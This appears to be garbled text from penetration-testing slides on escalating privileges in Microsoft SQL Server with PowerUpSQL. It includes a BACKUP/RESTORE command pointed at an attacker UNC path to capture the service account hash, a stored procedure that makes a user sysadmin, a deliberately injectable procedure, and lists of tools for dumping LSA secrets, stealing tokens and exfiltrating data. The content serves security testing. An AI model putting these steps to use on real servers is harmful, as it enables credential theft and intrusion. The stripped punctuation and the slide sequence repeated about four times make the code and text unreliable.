Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
bull A patch was released for SQL Server versions 2012 through 2016
httpstechnetmicrosoftcomlibrarysecurityMS16-131
bull There is no fix for SQL Server 2000 to 2008
Escalating Privileges UNC Path Injection
So in summaryhellip
The PUBLIC role can access the SQL Server service account NetNTLM
password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Scalability via runspace threading Flexibility via pipeline support
ps objects and data tables Portability
o No SMO dependancieso Net Framework librarieso PowerShell v2 compliant (in theory)o Single file
Functional Goals Discover SQL Servers from different attacker perspectives Inventory SQL Servers quickly Audit SQL Servers for common insecure configurations Escalate privileges quickly on SQL Servers Support authentication using SQL Login or Windows Credential
Unauthenticated List from file TCP port scan UDP port scan UDP broadcast Azure DNS dictionary attack (xdatabaseswindowsnet) Azure DNS lookup via public resources
Local User Services Registry entries
Domain User Service Principal Names Azure Portal PowerShell Modules
Find SQL Servers PowerUpSQLAttacker Perspective PowerUpSQL Function
Unauthenticated Get-SQLInstanceFile
Unauthenticated Get-SQLInstanceUDPScan
Local User Get-SQLInstanceLocal
Domain User Get-SQLInstanceDomain
Blog httpsblognetspicomblindly-discover-sql-server-instances-powerupsql
EscalatingPrivileges
Unauthenticated Domain User to SQL Login
Testing Login Access TechniquesWhat credentials can I use to log into discovered SQL Servers
Attacker Perspective Attack Technique
Unauthenticated Dictionary attacks using common user names and passwords
Unauthenticated Default passwords based on the SQL Server instance names
Local Windows or ADS Domain Account
Attempt to login using the current account
Testing Login Access PowerUpSQL CMDsWhat PowerUpSQL functions can I use to test for successful logins
Attack Technique PowerUpSQL Function
Dictionary Attack Invoke-SQLAuditWeakLoginPw
Default Password Test Invoke-SQLAuditDefaultLoginPw
2 Get principal id for the sa account with ldquosuser_idrdquo
3 Use ldquosuser_namerdquo to get SQL logins using just principal ID
4 Increment number and repeat
select n [id] SUSER_NAME(n) [user_name]from ( select top 10000 row_number() over(order by t1number) as Nfrom masterspt_values t1 cross join masterspt_values t2) awhere SUSER_NAME(n) is not null
Code gifted from mobileckSource httpsgistgithubcomConstantineKc6de5d398ec43bab1a29ef07e8c21ec7
3 Grab the first 48 Bytes of the full RID RID = 0x0105000000000005150000009CC30DD479441EDEB31027D000020000 SID = 0x0105000000000005150000009CC30DD479441EDEB31027D0
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
Prosbull Can execute queriescommands in another user contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATE
Consbull No granular control over the database ownerrsquos
privilegesbull DB_OWNER role can EXECUTE AS OWNER of the DB
which is often a sysadminbull Requires database to be configured as trustworthy for
OS command executionbull Impersonation can be done via SQL injection under
specific conditionsbull Impersonation can be done via command injection
under specific conditions
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull EXECUTE AS OWNER can be used to execute a stored procedure as another login
bull DB_OWNER role can impersonate the actual database owner
USE MyAppDbGOCREATE PROCEDURE sp_escalate_meWITH EXECUTE AS OWNERASEXEC sp_addsrvrolemember MyAppUsersysadminGO
SYSADMIN is often the
OWNER
Escalating Privileges ImpersonationStored Procedure and Trigger Creation Injection Issues
bull Use signed Procedures
o Create stored procedure
o Create a database master key
o Create a certificate
o Create a login from the certificate
o Configure login privileges
o Sign stored procedure with certifiate
o GRANT EXECUTE to User
Prosbull Can execute queriescommands in another user
contextbull Limit commands and queries bull Donrsquot have to grant IMPERSONATEbull Granular control over permissionsbull Database does NOT have to be configured as
trustworthy for OS command execution
Consbull Impersonation can be done via SQL injection
under specific conditionsbull Impersonation can be done via command
injection under specific conditions
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges ImpersonationSQL Injection Example CREATE PROCEDURE sp_sqli2
DbName varchar(max) ASBEGINDeclare query as varchar(max)SET query = lsquoSELECT name FROM mastersysdatabases WHERE name like + DbName+ OR name=tempdb EXECUTE(query)ENDGO
Escalating Privileges Shared Service AccountsWhy should I care about shared service accounts
1 SysAdmins can execute OS commands2 OS commands run as the SQL Server service account 3 Service accounts have sysadmin privileges by default4 Companies often use a single domain account to run hundreds of SQL Servers5 So if you get sysadmin on one server you have it on all of them
One account to rule them all
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging Shared MS SQL Server Service Accounts
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
LVA
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Execute Local Command via xp_cmdshell
2
Access to HVA with shared domain service account
Key
HVA = High Value Application
LVA = Low Value Application
Execute commands and gather data from other
database servers via osql
3
Leveraging Shared MS SQL Server Service Accounts
EscalatingPrivileges
Crawling SQL Server Links
Escalating Privileges Crawling SQL Server LinksWhatrsquos a SQL Server link
SQL Server links are basically persistent database connections for SQL Servers
Why should I care
Short answer = privilege escalation
Public role can use links to execute queries on remote servers (impersonation)
SELECT FROM OpenQuery([SQLSERVER2]rsquoSELECT Versionrsquo)
Stored procedures can be executed (xp_cmdshell)
Links can be crawled
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain EvilKey
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB1
LVA
Inte
rnet
DM
ZIn
tran
et
LRA HVA
LVA
ADS
Ports80 and 443
Ports1433 and 1434
HVA
PURE EVIL
Captain Evil
SQL Injection
1
Key
HVA = High Value Application
LVA = Low Value Application
Leveraging MS SQL Database links
DB Link with
Least Privileges
DB Link with
SA account
DB1
LVA
Execute SQL queries and local commands on
database servers via nested linked services
2
Escalating Privileges Crawling SQL Server Links
Penetration Test Stats
Database links exist (and can be crawled) in about 50 of environments wersquove seen
The max number of hops wersquove seen is 12
The max number of servers crawled is 226
Escalating Privileges Crawling Server Links
Old Script
Released 2012 httpswwwrapid7comdbmodulesexploitwindowsmssqlmssql_linkcrawler
New Functions
Author Antti Rantasaari httpsblognetspicomsql-server-link-crawling-powerupsql
Escalating Privileges Crawling Server LinksFunction Description
Get-SQLServerLink Get a list of SQL Server Link on the server
Get-SQLServerLinkCrawl Crawls linked servers and supports SQL query and OS command execution
bull The Public role can perform UNC path injection into the BACKUP and RESTORE commands
BACKUP LOG [TESTING] TO DISK = attackeripfilelsquoRESTORE LOG [TESTING] FROM DISK = attackeripfile
Partial Solution
